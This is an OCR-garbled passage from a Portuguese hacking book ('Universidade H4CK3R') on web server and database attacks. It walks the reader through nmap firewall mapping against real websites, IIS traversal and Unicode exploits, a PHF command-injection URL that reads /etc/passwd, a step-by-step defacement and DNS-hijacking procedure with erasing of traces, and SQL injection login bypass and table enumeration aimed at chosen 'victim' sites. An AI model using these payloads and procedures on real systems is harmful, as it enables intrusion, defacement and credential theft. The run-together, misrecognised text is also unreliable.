saintesSYNanteriores.Umportscanner(porexemplo,oNmap)podeenviar
pacotesACKparatodasasportasdeumdeterminadoendereço.Fazendoisso
comtodososendereçosdafaixadeIPsdesignadaparaaquelaredeépossível
determinartodasasregrasdef1ltragemdaquelefirewall.
Rede
Privada
11971
IVulnerabilidades11

IUniversidadeH4CK3R I
ParafazeroNmapenviarpacotesACKatodasasportasdeumaúnicamáquina,
utilizeaopção-sA(vocêdeveserrootparaisso):
#nmap-sAIP.A.SER.VASCULHADO
OpromptmostradoédeumUnix,masocomandonoWindowsseriaexata-
menteomesmo.Obviamente,podem-seusarosfrontendsgráficos(NmapWin
eNmapfe)parafacilitaratarefa,seassimfordesejado.
ÉpossívelfazeromesmoscancomtodasasportasdeumafaixadeIPs(ou
seja,diversasmáquinas).Porexemplo:
#nmap -sA192.168.1.*
VarretodososIPsde192.168.1.0a192.168.1.255
#nmap-sA192.168.1.3-127
VarretodososIPsde192.168.1.3a192.168.1.127
Dispareessecomandocontravárioswebsitesevocêveráquenemtodosfize-
ramaliçãodecasa.Escolhaumdeles(omaisesburacado)etente,apartirdos
dadosapresentadospeloNmap,determinarasregrasdofirewallemquestão.
OutrocomandomuitointeressantenestahoraéoTraceroutelTracert.Sevocê
estáemumamáquinaUnix,experimentedaroseguintecomando:
#tracerouteIP.DO.WEB.SERVER
EmumamáquinaWindows,ocomandoseria:
C:\TRACERT IP .DO.WEB.SERVER
VocêveráumalistacomtodososnúmerosIP(e,sedisponíveis,osnomesde
DNS)doscomputadoreseroteadoresqueestãonocaminhoentreoseucompu-
tadoreocomputadordestino.Émuitoprovávelque,sendoocomputadordesti-
noumwebserver,asduasinterfacesderede(ouseja,osnúmerosIP)imediata-
menteanteriorespertençamaofirewall.Játemos,comisso,trêsinformações
válidas:oendereçoIPdowebserver,osendereçoIPdofirewallesuasregrasde
filtragem.Comumpoucodepaciência,o"hacker"podetentardiversosendere-
çospróximoscomoNmapeoT,raceroutelTracerte,comosdadosobtidos,dese-
nharumdiagramaaproximadodaredeaseratacada.Perigoso,nãoémesmo?
Depossedessasinformações,umscannerdevulnerabilidades,comoovaloro-
soNessus,poderáabrirummundodeopçõesparainvadirqualquerumadas
máquinasencontradas.Bastadescobrirofuro,baixaroexploit(www.cert.org
ewww.securitifocus.com.pracomeçar)ecorrerparaoabraço.
ServidoresWeb
ÉprecisoconhecercomcertaprofundidadeosdaemondHTTPaseremata-
cadosparapoder,rapidamente,invadi-Iosealterarsuaspáginas.Conheceras
vulnerabilidadesexistentesnelesécrucialparaosucessodaempreitada.Após
invadidos,oscaminhosquelevamàspáginasdevemserdescobertosrapida-
menteparaevitarumtempomuitolongodeconexãoepossíveisrastreamentos.
1198I
Vulnerabilidades11[

Universidade2°Ano
Apache
OservidorHTTPnúmeroumnomundoéoApache(www.apache.org).É
umprogramadecódigoabertoelivredistribuiçãomuitoprestigiadoporseu
desempenho,segurançaeflexibilidade.Entretanto,nenhumsoftwareé100%
seguro,eoApachenãoéexceção.
OsarquivosdeconfiguraçãodoApachenormalmenteestãono/etc,nos
diretórios/etc!httpdou/etc/apache.Emalgumasimplementações,podemestar
em/usr/locaVapacheou/var!httpd.Éimportantequeoatacantesefamiliarize
comosconceitosdeoperaçãodeumservidorHTTP,comoApacheemespecial
e,principalmente,comoarquivodeconfiguraçãohttpd.conf.Outropontointe-
ressanteaestudarsãoosmecanismosdeacessoapáginasrestritaspormeiode
senhas.Taismecanismosusamarquivosnormalmentechamadosde.htaccespara
guardarologineasenhadosusuárioscadastrados.Todasessasinformações
constamnadocumentaçãodoproduto,disponívelnositeoficial.
AmelhormaneiradeaprendersobreoApacheémexendonele.InstaleumLinux
qualqueremumcomputadordetestesbemcomooApachemaisrecente.Brinque
comasconfigurações,procureHOwrosnaInternet,criepáginasdeacessorestri-
toe,principalmente,vejacomoahierarquiadediretórioséorganizada.
Comonemtudosãoflores,oApachepodeestarvulnerávelaataques.Além
demáconfiguraçãodoUnixqueohospeda,opróprioApachepodeestarmal
configurado.Masmesmoquetudoestejaemordem,podehaverfalhasno
softwarequepossibilitemumainvasão.Umexemplosimples.OApachepossui
ummódulo,mod_php,quepermiteaexecuçãodesistemasescritosnalingua-
gemPHPnoservidor.Algumasfunçõesdomod_phppermitemqueumprogra-
maexternosejaexecutado.Nessassituações,ocontroledaportapelaqualo
Apache"escuta"(normalmentea80)épassadoaesseprogramaexterno.Sendo
assim,éfácilfazerumprograminhacomcódigomaliciosoquepermitaao
hackertomarcontadaporta80:bastaqueoprogramanuncadevolvaocon-
troleparaoApacheequeestejaabertoparatransmissãodedadosporparte
dohacker.Oinvasorpodeenviarqualquercoisapelaporta80,inclusiveoutras
páginasHTML,semalteraroconteúdodaspáginashospedadasnoservidor.O
exploiteumaexplicaçãomaisdetalhadapodemserencontradosem
www.guninski.com/phpl.html.
SunONE /iPlanet
ASunofereceoservidorHTTPSunONE(anteschamadodeiPlanet),um
servidorpoderosoemuitorápido,mastambémcomalgunsbugs.OSunONE
fazpartedeumconjuntomaiordeferramentasparadesenvolvimentodeapli-
caçõescorporativasemJava,e,portanto,édifícil(masnãoimpossível)encontrá-
10servindopáginasdaWeb.Adocumentaçãosobreoservidorpodeserencon-
tradanapáginaoficial:wwws.sun.com/software/products/web srvr/
homewebsrvr.html.
1199I
IVulnerabilidades11

IUniversidadeH4CK3R I
UmadasvulnerabilidadesmaisconhecidasdoantigoiPlanetequealgumas
versõesdoSunONEherdaraméumbugnocomponentedepesquisadoservi-
dor-aquelecampoquepermiteaointernautaprocurarporalgumacoisaden-
trodosite.UmdosparâmetrosdepesquisaéocomandoNS-rel-doc-name.Uma
stringmuitolongaassociadaaesseparâmetrocausaumbufferoverflowno
componenteepermitequecódigosarbitrárioscompoderesdesuperusuário
sejamexecutadosnoservidor.Seemvezdecódigoforenviadaumastringqual-
quer("lixo"),oservidorpoderátravaresairdoar.Avulnerabilidadeestáexplicada
emdetalhesnositeSecurityFocus(www.securityfocus.com/bid/48511info).
MicrosoftInternetInformationServices(IIS)
Masocampeãoabsolutodefalhasdesegurançaemwebserversé,semdúvi-
da,oInternetInformationServer(ouIIS)daMicrosoft.Desdeseulançamento,
falhassãodescobertasquasequemensalmente,ealgumasvezesoshotrIxese
ServicePacksconsertamumaouduasfalhas,masabreoutrasmais.Osprimei-
rosataquesaoIISerampossíveisapenasmanipulandoaURLvisitada.Porexem-
plo,asprimeirasversõesdoIISpermitiamqueaURLfosseinformadaassim:
http://site.com.IIS.com/../../ArquivosdeprogramaslPerl/per1.exe
Noteo../../.IssoindicaaoWindowsNTparasubirdoisdiretórios.Ora,seestamos
em/www/documenroot/,bastasubirdoisdiretóriosparachegaraoraiz(C).Se
funcionar,qualquerdiretórioestarádisponívelaousuário,incluindoosquecon-
témprogramas.Se,emvezdenavegarcomobrowser,nossointrépidohacker
usaroprogramatelnet,aURLacimaprecedidapelocomandoGETtrariaoprompt
decomandodointerpretadorPerI.Apartirdele,qualquercoisaépossível.
Hoje,omaiorproblemadoIISsãoosataquesconhecidoscomocrosssite
vulnerabilities.OatacantedevemontarumsitecomIISenelecolocaruma
páginaHTMLcontendoumscript(podeser]avascriptouVBScript)queapon-
teparaalgumasdaspáginasdeadministraçãodoservidor,notadamenteos
presentesnapastaIISHELP.Oscriptpodetambémserenviadopore-mail(eo
Outlookalegrementeoexecutarásemperguntar).Aoserexecutado,oscript
tomarápossedoIISvítimaenãodoIISdohacker.Usandoessafalha,oatacan-
tepodemonitorarsessões,copiardadosedocumentosimportantesoumesmo
executaralgunstiposdeprogramas.
ÉinteressantenotarqueoIISHELPébloqueadoparaazonadaInternet.Um
scriptvindodeforadaredenuncaconseguiriaacessá-Io.Masaoexecutarde
dentrodarede(peloInternetExploreroupeloOutlook),ousuárioestádando
aoscriptospoderesnecessáriosparacontrolaraspáginasadministrativas.O
anúnciodessafalhapodeservistonoTechNet(www.microsoft.com/technet)
sobocódigoMS02-062.
OutroproblemagrandecomoIISéoUnicodeBug.OWindowsNT(eseu
ftlho,oWindows2000)estápreparadodesdehámuitotempoparasuportara
codillcaçãodecaracteresUnicode,quevisaaunillcarosconjuntosdecaracteres
1200I
VulnerabilidadesIIr

Universidade2°Ano
detodasaslínguasdomundo,acabandocomosproblemasde
internacionalizaçãodeprogramasesites.Ocorreque,apesardeosSOsesta-
rempreparadosparaoUnicode,oIISnãoestá.Enviandoumastringcominú-
meroscaracteresUnicode255c,épossível,no[maldastring,colocarcoman-
dosparaexecução.NoCD,inserimosalgunsexploitsparaoUnicodebug.Para
corrigirestafalhasugerimosquevocêsubstituaoservidorIISporumLinux
comApache(amelhoropção).SeinsistiremusaroWindows,apliqueopatch
oficial,disponívelemmicrosoft.com/technet/security/bulletin/msOO-057.asp.
OIISaindaprestaumserviçoaoinvasor,gravandodadosfalsosnologoCon-
formereportadonoSecurityFocus(www.securityfocus.com/bid/6795/info).
URLsespecialmentemalformadascomcódigoshexadecimaispodemfazercom
queosistemagraveentradasfalsasnosarquivosdelogoComisso,épossível
destruirregistrosdeinvasãoeconfundirosprogramasquelêemologo
Hádiversoslivrosescritossobreostrêsservidorescitados,eossitesoficiais
(especialmenteodoApache)fornecerãoinformaçõesdetalhadasefartadocu-
mentaçãosobreeles.Interrompaaleituradolivroeestude-os.Éimportante.
SugirotambémumapassadinhanoSecurityFocus(www.securityfocus.com)e
umabuscapelasvulnerabilidadesdessestrêsservidoresdeHTIP.Seporacaso
osconceitosutilizadosnossitesforemmuitoobscurosparaoleitor,sugerimos
relertodoolivro,bemcomoosapêndicesnoCD-ROM.
CommonGatewayInterface(CGI)
OSservidoresHTTPpodemseramplamenteestendidoscomaadoçãode
mecanismosquepermitamochamadoconteúdodinâmico,umatecnologiaque
possibilitaamontagemdepáginaspersonalizadasedeconteúdovariávelpara
cadavisitanteeacesso.Taltecnologiaabriuasportasparaumainfinidadede
novosserviçosaointernauta,comoocomércioeletrônico,aspáginasinterativas,
osserviçosdenotíciaspersonalizáveiseotratamentodeformulárioson-line.
Dequebra,tambémabriuasportasparaoshackers.
AformamaisantigadedotarossitesdeconteúdodinâmicosãoosCommon
GatewayInterfaces,ouCGIs.Essesmódulos,agregadosaoservidorWeb,per-
mitemqueaspáginasHTMLoferecidaspossamtantoenviarquantoreceber
dadosdeumprogramaexterno.Comisso,sistemasdetratamentodedados
podemmanipularasinformaçõesrecebidasemostraroresultadonatela.Se
vocênãotemidéiadecomoissopodeserfeito,sugiropararaleituradeste
livro(novamente...)eiratrásdeumbomlivrosobreHTML.Não,não,seus
conhecimentosdeFrontPageouDreamweavernãovãoajudá-Ioagora.Depois
determinarseusestudossobreHTML,procureaprenderalgosobre]avaScript
eVBScript.Sódepoiscontinuenoparágrafoseguinte.
OsprogramasquefuncionamcomoCGIscriptspodemsermuitosimples.E
podemserimplementadosemquaisquerlinguagensdisponíveisnoservidor.
Porexemplo,numamáquinarodandoWindows,pode-seprepararum
1201I
]Vulnerabilidades11

IUniversidadeH4CK3RI
programinhaemDelphi,VisualBasicoumesmoumarquivodelote(.BAT)que
interajacomoIIS.NoUnix,pode-seusarPerI,Python,programascompilados
emCoumesmoshellscripts,comoCGls.Falhasnessesprogramaspodem
comprometerservidoresHTIPque,deoutraforma,estariamseguros.
FurosdesegurançaenvolvendoCGlssãotãoantigosquantoaprópria
tecnologia.OsprópriosservidoresjávinhamcomCGls-exemplopré-instala-
dos.Umexemplo,vindodeinstalaçõesUnixmuitoantigas,éafalhadotipo
PHF.OarquivoPHFéumCGIscriptusadoparaatualizarumalistadetelefones
depessoas.Essalistaédisponibilizadaon-linepeloservidorWeb,eépossível
montarumformulárioqueseutilizedesteCGIparaatualizaralista.
NossistemasUnixcomApache,olocalpadrãoparacolocarscriptsCGIéo
diretório/caminho/para!http/cgi-bin/.Pordefault,amaioriadosantigosservi-
doresWebinstalavamoPHFcomoexemplo,e,comoadministradoresdesiste-
manuncalêemadocumentação,osscriptsacabavamficando.Entretanto,o
scriptPHFcomporta-semalquando,juntocomcomandosválidos,coloca-se
umcaracterenewline(emhexadecimal,OAh)naURLdecontrole.Umataque
simplespoderiaser:
http://vulnserv.com/cgi-bin/phf?Qalias=x%Oa/bin/cat%20/etc/passwd.
Sevocêprestaratenção,depoisdonewline(OAh)foiemitidoocomando
/bin/cat/etc/passwd.
Ocaractere%20éocódigoASCIIparaespaçoembranco.Váriasaçõessão
possíveisecomandosemseqüênciasãoumaboaidéia.Normalmenteoscript
rodanoUnixemumshellmuitorestrito,sendoousuárionobodyo"campeão
deaudiência".SevocêtiverasortedeoCGIrodarcomSUID,pronto!Você
emitirácomandoscomoroot!
TantooPHFquantooUnixforamapenasexemplos.OutrosCGlssãovulne-
ráveis(quasetodos...)eépossívelrodarcomandosdeoutrasplataformas.Um
servidorWindowsNTaceitaoscomandosdoDOS,porexemplo.
AmelhormaneiradeseprecaverquantoaosproblemasdosscriptsCGIé
nãoosusar.Porcontadisso,outrasformasdeinteragircomousuáriosãoas
maisutilizadasatualmente.Algunsexemplossãoosservidoresdeaplicações
ZopeeColdFusioneaslinguagensdinâmicasASPePHP.Masmesmoelespos-
suemfuros,porémnãotãotoscosquantoosdosCGls.
PHPeASP
Asduaslinguagensmaisusadasparaaimplementaçãodesitesdinâmicosna
Websão,sempre,cheiasdefalhas.Comoelasprecisamefetuaralgum
processamentoantesdeenviarapáginaHTMLformatadaaobrowser,épossí-
velinserircomandosmaliciososnaURLouemalgumformulárioeconseguir
umshellparasi.Comoshell,aportaparaseudefacementestáaberta.
AlinguagemPHP(HypertextPreprocessor)foidesenvolvidaparasubstituir
12021
Vulnerabilidades11[

Universidade2°Ano
osscriptsCGIemservidoresUnix,emboratenhasidoportadaparadiversas
plataformas,incluindoWindows.OsistemaActiveServerPages(ASP),da
Microsoft,poroutrolado,écomoum"shell"queinterfaceiaoservidorIlSe
qualquerlinguagemexterna.AmaisusadaparamontarprogramasemASPéo
VBScript,masmuitasoutraspodemserusadas,incluindo]avascripteWSE.
Apesardamaiorsegurançaedesempenhoqueessaabordagemoferece-afi-
nal,nenhumprogramaexternoaoservidorWebestásendorodado-,aindahá
algumasfalhasquepodemserexploradas.Paraumalistacompleta,consulte
seusitedevulnerabilidadespreferido,porexemplooSecurityFocus
(www.securityfocus.com),oLinuxSecurity(www.linuxsecurity.org)ouo
SecurityBugware(www.securitybugware.org).
Defacements
Depoisdeatacarcomputadorespessoais,apróximagrandeempreitadados
scriptkiddieséadesfiguraçãodewebsites,oschamadosdefacements.Até
agora,conseguimosverificar(apenascomNmapeTraceroute/Tracert)osfu-
rosnofirewallemapeartodaaredediretamenteconectadaàInternet.Apren-
demosaindaausarproxiesparaaumentarnossoanonimatoeamandarfake-
mails-coisaquefacilitaavidadequalquerengenheirosocial.Aredeinterna
aindaéinacessívelparanós.Porenquanto...
Umdefacementéalgosimplesdefazer.Claroquehácasosecasos,alguns
maisdifíceis,outrosextremamenteinfantis,masnogeralospassosbásicos
paraumdefacementsão:
1EngenhariaSocial,aplicadaaosadministradoresdosite.Umexemploclássi-
coéoprópriositedaDigerati(www.digerati.com).quefoidesfiguradopela
hackerjuvenilMelpôneme.Usandoapenastécnicasdeengenhariasocial,elades-
cobriuassenhasdosadministradoresdositedaDigeratinoregistronacionalde
domínios(registro.br).Apartirdosdadosobtidoslá,acessandocomassenhas
conseguidas,invadiuoDNS(tambémsemexploits,apenascomsenhasconseguidas
porengenhariasocial)queapontavaparanossoservidorWebealterouoIP,apon-
tandoparaoservidordela.Resultado:ossitesdaGeekedaDigeratiaparente-
mentedesfigurados.AimagemdositedesfiguradoestánoCD.
2ComES,tudoficamaisfácil.Mascomouseminformaçõesprivilegiadas,
deve-secuidardoanonimatoquandotentarqualquerataquecomferramentasde
informática.Paraisso,cuidedeseprotegercomspoofmgeproxiespúblicos.
3FaçascansdeportasedevulnerabilidadesatédescobrirseosDNSsouo
webservertêmfalhasquepodemserexploradas.Sesim,váatrásdosexploits
econsigaacessoaoshelldamáquina.Observequemuitasvezesvocêteráaces-
sorestrito,entãoprecisaráfazercrackingdesenhasoubruteforce(videcapí-
tulo7,Vulnerabilidadesl)paraconseguiracessoaosuperusuário.
12031
IVulnerabilidades11

IUniversidádêH4CK3RI
4
Umavezcom acesso,procurepelosdiretóriosemqueaspáginassão
guardadas.EmmáquinasWindowscomIISelasficamem/www/documentroot.
EmmáquinasUnixisso
évariável,podeestarem!home!http,/var/www,/var/
http,/usr/local/apache/www, entreoutros.Utilizeocomandofmd(ou,sedis-
ponível,ocomandolocate)paraencontrarodiretóriowwwouhttp.
5Encontradoodiretório,sejabonzinhoefaçabackupdetodoosite,colo-
cando-oemumarquivocompactadodeixadoaímesmooucopiando-oparaum
diretórioqualquer.
6Substituaoindex.html(ou.phpou.aspou.htmou.xhtmlou.shtm...)peloseu
próprio,já previamentediagramado, ANTESdeiniciarainvasão.Vocênãoquerdei-
xaraconexãoabertaenquantocriaapágina,perigandoserrastreado,nãoémesmo?
7Apaguetodososseusrastros. .
EmcasodemáquinasDNS,oprocedimentoésimilar.Vocêdeveterumservi-
dorWebnoaretestado,contendoapáginaasermostrada.InvadaoDNSealtere
asentradas.Porexemplo,vocêéafavordaguerranoIraqueequerdesfiguraro
sitewww.stopthewar.org (Atençãolammers-estesitenãoexiste!).Descubra
qualoDNSqueapontaparaele(dica:useoserviçoWHOIScomocomando
nslookup)einvadaamáquina.Lá,vocêvaiencontrarodomíniostopthewar.org
associadoaumdeterminadonúmeroIP.TroquepeloIPdoseuservidorWeb
contendoapáginafalsaepronto,estáfeito!Nãoseesqueçadeverificarsehá
DNSssecundários.Vocêterádemonitorá-Iosparacertificar-sedequesuaaltera-
çãosejapropagada,casocontrário,terádeinvadi-Iostambémealterá-Ios"àmão".
BancosdeDados
Amaioriadossitescomconteúdodinâmicoecontroledeacessoutiliza-sedeban-
cosdedados.Osprimeirosparaarmazenarosretalhosdecódigoafimdeusarpara
montaroHfMLentregueaocliente,ossegundosparamanterocadastrodosusuári-
os.Ambospodemserfacilmenteacessadoscomalgumtrabalhobraçal.
ConectandodiretamenteviaInternet
Certosadministradoresderedes(oumesmousuáriosleigos...)deixamseus
bancosdedadoscompletamente escancaradosnaInternet,semf1ltragempor
firewall.Épossívelconectar-seaelespormeiodasferramentasdisponíveisno
própriosistemaoperacional,ouinstalando,nocomputadordoatacante,um
bancodedadosidênticoaodavítima.
Umexemploprático:naInternet,vocêencontroucomumscannerde
vulnerabilidades(porexemplo,oNessus)umservidorUnixrodandoobanco
dedadosPostgreSQL.Paraacessá-Io,bastainstalareconfigurarumfrontend
gráficoparaacessoeadministraçãodosbancosdedadosdoProstgrechamado
pgaccess(www.frex.ro/pgaccess).
2041
Vulnerabilidades11[

Universidade2°Ano
Umpoucodeengenhariasocialserá
necessárioparadescobrirosnomesdas
basesdedadosedeusuários.O
PostgreSQLfoisóumexemplo,épossí-
velfazerissocomqualquerbancode
dados,inclusiveoMS-SQLeoAccess,
quandoconfiguradoscomofontesde
dadosODBCpararede.Umainstalação
comasopções-padrãodobancodeda-
dosaseratacado,namáquinadoata-
cante,ajudaemuitoadescobrircon-
tas-padrão.ScriptsdeconexãoaSQLe
ODBC,sebemescritos,podemauxiliar
emumeventualbroteforce.Procure
aprofundar-senastecnologiasdeban-
cosdedados.AInternetestácheiadetutoriaissériosarespeitodoassunto.
Recomendamosavocê,antesdetentaratacartaisprogramas,procurarsaber
comousá-Iosdamaneiracorreta.Humm,talvezsejahoradevocêinterromper
novamentealeituradolivro...
SenhasnaWeb[teoriaxprática)
Todograndesitesolicitaqueointernautasecadastreparaliberarconteúdo
exclusivo.Depoisdocadastro,énecessárioqueointernautaforneçalogine
senhatodavezqueentrarnosite.Seoserviçoécobradoounão,nãointeressa.
Osdadosdousuárioserãocatalogadosemantidosemumbancodedados,e
usadospelaempresamantenedoradositeparaquaisquerfins.Normalmente
taisempresaspossuemedivulgamumapolíticadeprivacidade,garantindo
queseusdadosestãonumambienteseguro,livredeolhosmaliciososequea
própriaempresanãoosdivulgarávoluntariamentesobqualquerpretexto.
Mesmocomasdesconfiançasdepraxe,namaioriadasvezes,acreditamosna
palavradosprofissionaisaquemconfiamosnossasinformações,bemcomona
segurançadeseussistemas.
Essefalaróriotodonosdáaimpressãodequenossosdadosestarãoseguros,
certo?Ledoengano.Nemsempreossitesseutilizamdeferramentasadequadas
paradesenvolverseusprodutoseserviços.Váriastécnicaspodemserusadas
paraenganarasrotinasdeloginenosforneceracessoprivilegiadoaositeou
mesmoobterosloginsesenhasdosoutrosusuários.Umadastécnicaséa
chamadaSQLInjection,queconsisteeminserircomandosdalinguagemSQL
noscamposdeloginesenhapara,deacordocomamensagemdeerroretornada
peloservidor,mapeartodoobancodedadosdosusuários.Essemétodofunci-
onaparascriptsASPqueseutilizamdechamadasSQL,maspodeseradaptado
paraqualquerlinguagemdescriptingouCGI,comoPHPouPerI.Asintaxe
podeserdiferente,masomecanismoésimilar.
12051
]VulnerabilidadesII

IUniversidadeH4CK3R I
EMTEMPO!ConheceSQL,ASPePHP?Não?Épena,massouforçadoasugerir
quevocêparenovamentealeituradolivroeprocureinstruir-senessesassuntos.
ComececomumbancodedadossimplescomooMySQLeumalinguagemlivre
comooPHP.BonspontosdepartidasãoossitesWebmonkey(wwwwebmonkey.com)
eDeveloper'sShed(wwwdevshed.com).OssitesoficiaisdoPHP(wwwphp.neOe
MySQL(wwwmysq1.com)tambémsãobemprodutivos.Umaprocuraemsitesde
buscapelaspalavras"PHPMySQLTutorial"ebonslivrossobreoassunto(esãomuitos)
completamsuasnecessidadesiniciais.
Partimosdoprincípiodequesempreexisteumatabela,dentrodobancodedados,
quecontémtodasasinformaçõescadastraisdosusuários.Nãoéestimativa:estatabe-
laénecessária!Nãosabemos(ainda)qualonomedatabela-podeserUsers,
Usuários,UserDB,Papagaio,SacoDePitombas-,então,porenquanto,vamoschamá-la
detabela_usuarios.Atabeladeusuáriospodepossuirdiversoscampos,comoende-
reço,telefone,e-mailparaconfirmaçãoounúmerodocartãodecrédito.Mashá
quatrocamposquesãoobrigatóriosemqualquertabeladessas.Osnomesdoscam-
posobviamentepodemvariar,massuasfunçõesnormalmentesãoasmesmas:
~ID:Umidentificadorúnicodecadausuárionosistema.Éachamada"chave
primária",eénecessáriaparaocorretofuncionamentodatabelaeseusrelaci-
onamentoscomoutrastabelas.
~NomeCompleto:Camponãotãoimportanteparaaautenticação,mastrata-seuma
maneiradepersonalizaro funcionamentodositeparacadausuário.
~Loginesenha:Oscamposmaisimportantes;garantemoacessoaosite
paraosusuárioscadastrados.
~Admin:Umflagqueindicaseousuáriotempoderesespeciaisparaadmi-
nistrarosite.
Umexempodetabelaseria:
Essefragmentodetabelanosrevelacoisasinteressàntes.Oquemaissaltaà
vistaéqueassenhasdosusuárioscomunsnormalmentesãomuitofracas,eum
bomataquepordicionáriofacilmenteasdescobriria.Masháalgoque,detão
óbvio,passadespercebidopelamaioriadaspessoas:osadministradoresquase
sempresãoosprimeirosnomesdalista.Emmaisde90%doscasos,oID1da
tabelacorrespondeaodesenvolvedor,queseguramentedeuasimesmopoderes
deadministradorparapoderfazerostestesnecessários.Essainformaçãoserá
útilmaisparafrente.
12061
VulnerabilidadesII[
IDNomeCompleto Login Senha Admin?(S/N)
1HenriqueCesarUlbrich ulbrichW6rYwH S
2JamesFábioDellaValle james D3114V4113 S
3 SuzanaWarren suzy pipoca N
4 FabioCruz fcruz blaublauO1 N

Universidade2°Ano
Voltemosaosite.Quandoousuáriopreencheoscamposdeloginesenha,o
scriptASPosguarda,cadaumemumavariável.Vamoschamá-Iasdelogine
senha.Nãoémuitooriginal,mastenhacertezadequeumgrandenúmerode
sistemasporaíutilizaexatamenteessesnomes,algumavariaçãodelesouseu
correspondenteeminglês.
OpróximopassoseriaoscriptASPcompararosdoiscamposcomoqueestá
cadastrado,paragarantiroubarraroacessoaosite.Umexemplodecomando
ASPseria:
SQLOpen
=ffSELECTlogin,senha,nome,admin
FROMtabela_usuarios
WHERElogin ='ff&Login&ff,
ANDsenha='ff&Senha&ff,ff
OqueessecomandofazémandarparaobancodedadosumcomandoSQLpara
listartodososusuáriosquecontenhamologineasenhainformados.Porexemplo,se
uminternautadigitar,comologinesenha,"junior"e"fabio",astringSQLficariaassim:
SELECTlogin,senha,nome,adminFROMtabela_usuarios
WHERElogin ='junior'ANDsenha='fabio'
Trocandoemmiúdos,essecomandosolicitaráaobancodedadosumalista
comtodososregistroscujocampologinforjunioreocamposenhasejafabio.
Emumsistemabem-feito,nãohaveránomesdeloginrepetidos,logoobancovai
retornarosdadosdousuário,seeleexistir.CompareocomandoASPeocoman-
doSQLpuro.Noprimeiro,aspasduplasseparamoqueéumastringpuradoque
écomandoASP.Asaspassimplessãoconsideradaspartedastringpura.Como
podemosperceber,osvaloresatribuídosaoscamposloginesenhaestãoentre
aspassimples.Hummm...Eseeucolocar,nomeiodomeulogin,umaaspasim-
plestambém(porexemplo,jun'ior)?OcomandoSQLresultanteserá:
SELECTlogin,senha,nome,adminFROMtabela_usuarios
WHERElogin ='jun'ior'ANDsenha='fabio'
OSQLconsideraráonomedelogincomoapenasjuneorestodonome,ior,
comopartedocomandoSQL.IORnãoéumcomandoSQLválido,portantoa
páginaretomaráumerro.Éjustamenteesseerroque,maisparafrente,nos
diráqualaestruturadatabela.Porora,vamosusá-Ioparainserirmaiscoman-
dosSQLnocampodelogin.
Experimente,nologin,inseriraseguintestring
,OR1=1 --
evejaoqueacontece.Possivelmentevocêselogoucomoadministrador!!!Va-
mosanalisarcomoessafeitiçariafuncionanastringSQL:
SELECTlogin,senha,nome,adminFROMtabela_usuarios
WHERElogin
=" OR1=1 --ANDsenha="
Traduzindoastringparaoportuguês(issosemprefacilita...):"SELECIONE
oscamposlogin,senha,nome,adminDATABELAtabela_usuariosEMQUEo
loginsejavazio('')ouacondição1 =1sejaverdadeira".Quêeee?1 =I?
EssacondiçãoSEMPREéverdadeira,portanto,ousuáriomagicamenteestá
12071
1Vulnerabilidades11

IUniversidadeH4CK3R I
logadonosistema!!!Asenhanuncaseráconsultadavalidada,poistodooresto
dastring(ANDsenha='')estácomentadocomosdoistravessões.
Sevocêjásouberonomedeusuáriodeumapessoaequiseracessarosiste-
macomseulogin,bastacolocarastringmágicanocamposenha.Oucomentar
ocampodelogin,apósentrarcomousuário.Porexemplo,sevocêsabequeo
logindesuamãeéneidem,tente:
login:neidem'-- senha:<vazio>
ou
login:
neidem senha:' OR1=1
Algumasvezesénecessáriocolocar'OR1=1tambémnocamposenha,em
vezdecomentarcomtravessõesofinaldocampologin.
Outrocasoéemsitespúblicoscomcadastrosnumerosos.Podemoscolocara
stringmágicanocampologine"chutar"umasenhaqualquer.OcomandoSQL
vaipuxartodososusuáriosquetiveremaquelasenha,evocêselogaráno
primeirodeles.Usesuaslistasdepalavras(lembra-sedocapítulo7?)eentre
seguramente.Vocêencontrarádiversasduplasnome/senha.Comumpoucode
organização,vocêpoderáfazerumalistadosnomesesenhasválidosnositee
usar"umpoucodecada",dificultandoorastreamentodascontasinvadidas.
Brinquebastantecomossitesescolhidosparavítima-sitescomMSSQLeASP
sãopresasperfeitas.ComseusconhecimentosdePHPeMySQL,monteumsite
paraexperiênciaseinsiratodososcomandosSQLquevocêconseguirlembrar.
Bem,agoraquejáconseguimosentrar,quetaldescobrircomoatabelaestá
montada?Lembre-sedequeestamoscompletamentecegosatéagora.Umcoman-
doconhecidodeSQLéoHAVlNG,quepermiteselecionargruposdecamposque
possuamumpadrãoespecífico.Coloque,nocampodelogin,astring,having
1=1--eobserveoresultado.Cadagerenciadordebancodedadosemitiráerros
diferentes,masemcomumelesterãoumamensagemparecidacomessa:
Column'userid'ontable'mainsite'isinvalidonthe
selectedlist
...
Opa!Obancodedadosalegrementenospresenteoucomonomedatabela,
mainsiteeonomedoprimeirocampodatabela,userid.Algunsbancosde
dadosretomariamovalordessecampoemformatoorientadoaobjetos,algo
comomainsite.USERID.Nãoimporta,játemosdoisdadosimportantes.Mais
parafrente,amensagemprovavelmentemencionaráquenãoháumacláusula
GROUPBYnocomando.Bem,vamosadicionartalcláusulaevernoquedá:
Usuario:
'GROUP BYmainsite.USERIDhaving 1=1--
Cruzes!Olhearespostadosite:
Column'userlogin'ontable'mainsite'isinvalidonthe
selectedlist
...
Jásabemosonomedosegundocampo!!!Tentemosdenovo:
U~o:' GROUPBYmainsite.USERID,mainsite.USERLOGINhaving
1=1--
1208I
Vulnerabilidades11[

Universidade2°Ano
Arespostaé:
Column'username'ontable'mainsite'isinvalidon
theselectedlist
...
Continuesuapesquisausandoessemétodo.Quandonãohouvermaismensa-
gensdeerro,voi1à,vocêpossuitodososcamposdatabela.Agora,vamosrecu-
peraraslinhasdatabela,ouseja,osregistrosdecadausuário.Vamosusaro
comandoSQLUNION:
Usuario:'UNIONALLSELECT useridFROMrnainsiteWHERE 1=1--
Precisoexplicar?Ovalordeuserid éretomadonamensagem.Façaissocom
todososcampos.Obviamente,seoscriptforbemescrito,essesartifíciosnão
funcionarão.Muitasvezesoscript
ébem-feitoetestaráoscamposàprocura
decaracteresmaliciososANTESdemandá-IosaocomandoSQL.Nessescasos
vocênãoconseguiráentrar,masaindapodeterumaindicaçãonamensagemde
errodositesobreosnomesdoscampos,databelaedabasededados.Anote
TUDOetentefazerumdiagrama.UmaespiadelanoqueéretomadonaURL
tambéméumaboa...
IssoéapenasobásicodobásicosobreSQLInjection.Parasabermaissobreo
assunto,recomendamosaleituradoexcelentelivroSegurançacontraHackers
-AplicaçõesWEB,deScambrayeShema(EditoraFutura/McGraw-Hill,394
páginas).UmapesquisanoGooglepelaspalavras"SQLInjection"vairetomar
praticamentetodaadocumentaçãodisponívelsobreoassunto.
Estamostodosvulneráveis?
